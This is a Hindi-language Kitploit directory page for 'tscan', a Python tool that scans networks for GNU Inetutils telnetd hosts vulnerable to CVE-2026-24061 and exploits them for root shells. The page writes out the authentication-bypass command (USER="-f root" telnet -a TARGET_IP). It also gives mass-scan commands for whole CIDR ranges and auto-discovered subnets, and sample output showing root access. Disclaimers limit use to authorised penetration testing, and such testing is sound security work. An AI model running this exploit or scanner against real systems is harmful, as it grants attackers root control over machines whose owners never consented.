Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
tscan — # Python-आधारित स्कैनर जो CVE-2026-24061 telnetd प्रमाणीकरण बायपास का पता लगाता है और उसका शोषण करता है, जिससे कमजोर GNU Inetutils सेवाओं पर रूट शेल एक्सेस सक्षम होता है। | Kitploit
उपकरण/GitHubGitHub/cumakurt/tscan
टोहीभेद्यता स्कैनरपोर्ट स्कैनिंगशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcumakurt/tscan

tscan

# Python-आधारित स्कैनर जो CVE-2026-24061 telnetd प्रमाणीकरण बायपास का पता लगाता है और उसका शोषण करता है, जिससे कमजोर GNU Inetutils सेवाओं पर रूट शेल एक्सेस सक्षम होता है।

रिपॉजिटरी देखें
17 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Telnetd प्रमाणीकरण बाईपास स्कैनर (CVE-2026-24061)

GNU Inetutils telnetd सेवाओं में CVE-2026-24061 भेद्यता का पता लगाने और उसका शोषण करने के लिए एक Python-आधारित स्कैनर। यह टूल IP पते या नेटवर्क को स्कैन करता है ताकि कमजोर telnetd सेवाओं का पता लगाया जा सके जो प्रमाणीकरण बाईपास की अनुमति देती हैं और रूट शेल एक्सेस प्रदान करती हैं।


⚠️ महत्वपूर्ण कानूनी सूचना और अस्वीकरण

यह सॉफ़्टवेयर केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

1. शैक्षिक उद्देश्य

यह एप्लिकेशन केवल शैक्षिक उद्देश्यों के लिए विकसित किया गया है ताकि सुरक्षा भेद्यताओं का प्रदर्शन किया जा सके और अधिकृत सुरक्षा परीक्षण और अनुसंधान में सहायता मिल सके।

2. कोई वारंटी नहीं

यह सॉफ़्टवेयर "जैसा है" प्रदान किया गया है, बिना किसी प्रकार की वारंटी के, व्यक्त या निहित, जिसमें व्यापारिकता, किसी विशेष उद्देश्य के लिए उपयुक्तता और गैर-उल्लंघन की वारंटी शामिल है लेकिन इन्हीं तक सीमित नहीं है। लेखक और योगदानकर्ता गारंटी नहीं देते कि सॉफ़्टवेयर त्रुटि-मुक्त, सुरक्षित या कार्यात्मक होगा। सॉफ़्टवेयर में बग, त्रुटियाँ या अन्य दोष हो सकते हैं।

3. उपयोगकर्ता की ज़िम्मेदारी

इस सॉफ़्टवेयर के उपयोग की सभी ज़िम्मेदारी और दायित्व पूरी तरह से उपयोगकर्ता पर है। इस सॉफ़्टवेयर के लेखक, योगदानकर्ता और वितरक इस सॉफ़्टवेयर के उपयोग, दुरुपयोग या उपयोग करने में असमर्थता से उत्पन्न किसी भी क्षति, हानि या कानूनी परिणामों के लिए उत्तरदायी नहीं होंगे।

4. अनधिकृत उपयोग निषिद्ध

इस टूल का उपयोग केवल उन सिस्टमों पर किया जाना चाहिए जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है और इसके परिणामस्वरूप आपराधिक अभियोजन हो सकता है।

5. कोई गारंटी नहीं

लेखक नहीं गारंटी देते:

  • स्कैन परिणामों की सटीकता
  • एप्लिकेशन की सुरक्षा
  • सभी सिस्टमों के साथ संगतता
  • बग या त्रुटियों की अनुपस्थिति
  • कोई विशिष्ट कार्यक्षमता या प्रदर्शन

इस सॉफ़्टवेयर का उपयोग करके, आप स्वीकार करते हैं कि आपने इन शर्तों को पढ़ा, समझा और उनसे बंधे रहने के लिए सहमत हैं। यदि आप सहमत नहीं हैं, तो इस सॉफ़्टवेयर का उपयोग न करें।


डेवलपर

द्वारा विकसित: Cuma KURT
ईमेल: [email protected]
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/

भेद्यता जानकारी

CVE-2026-24061: GNU Inetutils telnetd संस्करण 2.7 तक USER पर्यावरण चर के लिए -f root मान के माध्यम से दूरस्थ प्रमाणीकरण बाईपास की अनुमति देता है।

CVSS स्कोर: 9.8 (गंभीर)

संदर्भ: NVD CVE-2026-24061

विशेषताएँ

  • 🔍 पोर्ट स्कैनिंग: खुले telnet पोर्ट का पता लगाता है (डिफ़ॉल्ट: 23, अनुकूलन योग्य)
  • 🎯 भेद्यता का पता लगाना: CVE-2026-24061 की शोषण क्षमता का परीक्षण करता है
  • ⚡ मल्टी-थ्रेडेड: कॉन्फ़िगर करने योग्य थ्रेड गणना के साथ तेज़ समवर्ती स्कैनिंग
  • 📁 लचीला इनपुट: IP पते, CIDR नेटवर्क और फ़ाइल-आधारित लक्ष्य सूचियों का समर्थन करता है
  • 🗺️ स्वचालित पहचान: रूटिंग टेबल से सबनेट का स्वचालित रूप से पता लगाना और स्कैन करना
  • 🛑 सुरक्षित रुकावट: Ctrl+C स्कैन को सुरक्षित रूप से रोकता है और आंशिक परिणाम दिखाता है
  • 📊 रीयल-टाइम प्रगति: आँकड़ों और निष्कर्षों के साथ प्रगति पट्टी

स्थापना

पूर्वापेक्षाएँ

  • Python 3.6 या उच्चतर
  • telnet क्लाइंट (आमतौर पर Linux/macOS पर पहले से इंस्टॉल होता है)

निर्भरताएँ स्थापित करें

root@kitploit:~
pip3 install -r requirements.txt

नोट: अधिकांश निर्भरताएँ Python मानक पुस्तकालय का हिस्सा हैं। यह टूल Python 3.6+ के साथ तुरंत काम करता है।

उपयोग

बुनियादी उपयोग

root@kitploit:~
# एकल IP पते को स्कैन करें
python3 tscan.py 192.168.1.1

# CIDR नेटवर्क को स्कैन करें
python3 tscan.py 192.168.1.0/24

# कस्टम पोर्ट के साथ स्कैन करें
python3 tscan.py -p 2323 192.168.1.1

# फ़ाइल से लक्ष्यों को स्कैन करें
python3 tscan.py targets.txt

# कई IP पतों को स्कैन करें
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1

# कई CIDR नेटवर्क को स्कैन करें
python3 tscan.py 192.168.1.0/24 10.0.0.0/16

प्रदर्शन ट्यूनिंग

root@kitploit:~
# तेज़ स्कैनिंग के लिए थ्रेड गणना बढ़ाएँ (100 थ्रेड)
python3 tscan.py -t 100 192.168.1.0/24

# धीमे नेटवर्क के लिए टाइमआउट बढ़ाएँ
python3 tscan.py --timeout 10 192.168.1.0/24

# बड़े नेटवर्क स्कैन के लिए दोनों को संयोजित करें
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16

स्वचालित पहचान मोड

root@kitploit:~
# सिस्टम रूटिंग टेबल से सभी सबनेट का स्वचालित रूप से पता लगाएं और स्कैन करें
python3 tscan.py --auto
# या छोटा रूप उपयोग करें:
python3 tscan.py -a

# कस्टम पोर्ट के साथ स्वचालित पहचान
python3 tscan.py --auto -p 2323
# या:
python3 tscan.py -a -p 2323

# उच्च थ्रेड गणना के साथ स्वचालित पहचान
python3 tscan.py --auto -t 200
# या:
python3 tscan.py -a -t 200

नोट: --auto मोड ip route list या route -n कमांड का उपयोग करके सिस्टम रूटिंग टेबल पढ़ता है और सभी पहचाने गए सबनेट को स्वचालित रूप से स्कैन करता है।

वास्तविक-विश्व उदाहरण

root@kitploit:~
# उदाहरण 1: स्थानीय नेटवर्क का त्वरित स्कैन
python3 tscan.py 192.168.1.0/24

# उदाहरण 2: उच्च समवर्तीता के साथ तेज़ स्कैन
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16

# उदाहरण 3: गैर-मानक telnet पोर्ट को स्कैन करें
python3 tscan.py -p 2323 192.168.1.0/24

# उदाहरण 4: सभी स्थानीय नेटवर्क सबनेट का स्वचालित रूप से पता लगाएं और स्कैन करें
python3 tscan.py --auto
# या:
python3 tscan.py -a

# उदाहरण 5: कस्टम सेटिंग्स के साथ स्वचालित पहचान
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# या:
python3 tscan.py -a -p 2323 -t 100 --timeout 8

कमांड लाइन विकल्प

root@kitploit:~
positional arguments:
  targets               IP पता(पते), CIDR नेटवर्क, या लक्ष्यों वाले फ़ाइल पथ

options:
  -h, --help            यह सहायता संदेश दिखाएं और बाहर निकलें
  -p, --port PORT       स्कैन करने के लिए Telnet पोर्ट (डिफ़ॉल्ट: 23)
  -t, --threads THREADS समवर्ती थ्रेड की संख्या (डिफ़ॉल्ट: 50)
  --timeout TIMEOUT     सेकंड में कनेक्शन टाइमआउट (डिफ़ॉल्ट: 5)
  -v, --verbose         विस्तृत आउटपुट
  -a, --auto            सिस्टम रूटिंग टेबल से सभी सबनेट का स्वचालित रूप से पता लगाएं और स्कैन करें (route -n या ip route list)

इनपुट फ़ाइल प्रारूप

एक टेक्स्ट फ़ाइल बनाएं जिसमें प्रति पंक्ति एक लक्ष्य हो:

root@kitploit:~
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16

# से शुरू होने वाली पंक्तियाँ टिप्पणियों के रूप में मानी जाती हैं और अनदेखा की जाती हैं।

आउटपुट

यह टूल प्रदान करता है:

  1. रीयल-टाइम प्रगति: परिणाम खोजे जाने पर दिखाता है

    • प्रतिशत और आँकड़ों के साथ प्रगति पट्टी
    • प्रगति पट्टी में कमजोर होस्ट गणना प्रदर्शित
    • [!] - कमजोर होस्ट
    • [~] - पोर्ट खुला लेकिन कमजोर नहीं
    • बंद पोर्ट वाले लक्ष्यों को चुपचाप छोड़ दिया जाता है
    • Ctrl+C (KeyboardInterrupt): स्कैन को सुरक्षित रूप से बाधित करता है और तुरंत आंशिक परिणाम दिखाता है
  2. सारांश रिपोर्ट: इसमें शामिल है:

    • कुल पाई गई telnet सेवाएँ
    • कमजोर होस्ट की संख्या
    • कमजोर होस्ट की विस्तृत सूची

उदाहरण आउटपुट

बुनियादी स्कैन आउटपुट

root@kitploit:~
[*] 256 लक्ष्यों पर स्कैन शुरू...
[*] पोर्ट: 23, थ्रेड: 50, टाइमआउट: 5s

[*] प्रगति: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | खुले: 2 | कमजोर: 1
[!] 192.168.1.100:23 - कमजोर
[*] प्रगति: [████████████████████████████████████] 100.0% (256/256) | खुले: 3 | कमजोर: 1
[+] स्कैन पूर्ण: 256/256 लक्ष्य स्कैन किए गए

======================================================================
स्कैन परिणाम सारांश
======================================================================

पाई गई Telnet सेवाएँ: 3
कमजोर होस्ट: 1

[!] कमजोर होस्ट:

  ● 192.168.1.100:23
    आउटपुट: uid=0(root) gid=0(root) groups=0(root)...

[~] पाई गई Telnet सेवाएँ लेकिन कमजोर नहीं:

  ● 192.168.1.101:23
  ● 192.168.1.102:23

[*] स्कैन 12.34 सेकंड में पूर्ण हुआ

यह कैसे काम करता है

  1. पोर्ट का पता लगाना: जाँचता है कि लक्ष्य IP पर telnet पोर्ट खुला है या नहीं
  2. शोषण प्रयास: खुले पोर्ट के लिए, CVE-2026-24061 शोषण का प्रयास करता है:
    • USER="-f root" पर्यावरण चर सेट करता है
    • telnet -a कमांड के माध्यम से कनेक्ट करता है
    • रूट शेल एक्सेस सत्यापित करने के लिए परीक्षण कमांड भेजता है
  3. परिणाम वर्गीकरण: परिणामों को कमजोर या कमजोर नहीं के रूप में वर्गीकृत करता है

शोषण विवरण

यह भेद्यता USER पर्यावरण चर को -f root पर सेट करके प्रमाणीकरण बाईपास की अनुमति देती है:

root@kitploit:~
USER="-f root" telnet -a TARGET_IP [PORT]

यह telnetd को USER चर को एक फ्लैग के रूप में व्याख्या करने का कारण बनता है, प्रमाणीकरण को बाईपास करता है और रूट एक्सेस प्रदान करता है।

सीमाएँ

  • telnet क्लाइंट इंस्टॉल होना आवश्यक है
  • केवल कमजोर telnetd संस्करणों (≤ 2.7) के खिलाफ काम करता है
  • स्वचालित पहचान मोड के लिए ip route list या route -n कमांड की आवश्यकता होती है

समस्या निवारण

"telnet कमांड नहीं मिला"

telnet क्लाइंट इंस्टॉल करें:

root@kitploit:~
# Debian/Ubuntu
sudo apt-get install telnet

# CentOS/RHEL
sudo yum install telnet

# macOS
# आमतौर पर पहले से इंस्टॉल होता है

कोई परिणाम नहीं मिला

  • सत्यापित करें कि लक्ष्य पहुंच योग्य हैं
  • फ़ायरवॉल नियम जाँचें
  • सुनिश्चित करें कि telnet सेवाएँ वास्तव में चल रही हैं
  • टाइमआउट बढ़ाने का प्रयास करें: --timeout 10

कानूनी और नैतिक उपयोग

यह टूल निम्नलिखित के लिए है:

  • ✅ अधिकृत पैठ परीक्षण
  • ✅ आपके अपने सिस्टम पर सुरक्षा अनुसंधान
  • ✅ उचित प्राधिकरण के साथ भेद्यता मूल्यांकन
  • ✅ नियंत्रित वातावरण में शैक्षिक उद्देश्य

इस टूल का उपयोग न करें:

  • ❌ सिस्टम तक अनधिकृत पहुंच
  • ❌ अवैध हैकिंग गतिविधियाँ
  • ❌ स्पष्ट अनुमति के बिना कोई भी गतिविधि

संदर्भ

  • CVE-2026-24061 विवरण
  • SafeBreach Labs विश्लेषण

लाइसेंस

यह प्रोग्राम मुफ्त सॉफ़्टवेयर है: आप इसे फ्री सॉफ़्टवेयर फाउंडेशन द्वारा प्रकाशित GNU जनरल पब्लिक लाइसेंस की शर्तों के तहत, लाइसेंस के संस्करण 3 या (आपकी पसंद पर) किसी भी बाद के संस्करण के तहत पुनर्वितरित और/या संशोधित कर सकते हैं।

यह प्रोग्राम इस उम्मीद में वितरित किया जाता है कि यह उपयोगी होगा, लेकिन बिना किसी वारंटी के; यहां तक कि व्यापारिकता या किसी विशेष उद्देश्य के लिए उपयुक्तता की निहित वारंटी के बिना भी। अधिक विवरण के लिए GNU जनरल पब्लिक लाइसेंस देखें।

आपको इस प्रोग्राम के साथ GNU जनरल पब्लिक लाइसेंस की एक प्रति प्राप्त होनी चाहिए। यदि नहीं, तो https://www.gnu.org/licenses/ देखें।

पूर्ण लाइसेंस पाठ

पूर्ण GNU जनरल पब्लिक लाइसेंस v3.0 पाठ के लिए LICENSE फ़ाइल देखें।

अस्वीकरण

लेखक और योगदानकर्ता इस टूल के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं हैं।

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

अपने जोखिम पर उपयोग करें। इस सॉफ़्टवेयर के उपयोग की सभी ज़िम्मेदारी और दायित्व पूरी तरह से उपयोगकर्ता पर है। लेखक इस सॉफ़्टवेयर की सटीकता, सुरक्षा या कार्यक्षमता की गारंटी नहीं देते। सॉफ़्टवेयर बिना किसी प्रकार की वारंटी के "जैसा है" प्रदान किया गया है।

यह एप्लिकेशन केवल शैक्षिक उद्देश्यों के लिए विकसित किया गया है। इस सॉफ़्टवेयर का उपयोग करके, आप स्वीकार करते हैं कि:

  • आप समझते हैं कि यह एक शैक्षिक उपकरण है
  • इसके उपयोग की सभी ज़िम्मेदारी आपकी है
  • लेखक कोई गारंटी या वारंटी प्रदान नहीं करते
  • आप इसका उपयोग केवल उन सिस्टमों पर करेंगे जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • अनधिकृत उपयोग अवैध है और इसके परिणामस्वरूप आपराधिक अभियोजन हो सकता है

यदि आप इन शर्तों से सहमत नहीं हैं, तो इस सॉफ़्टवेयर का उपयोग न करें।

टूल डाउनलोड करें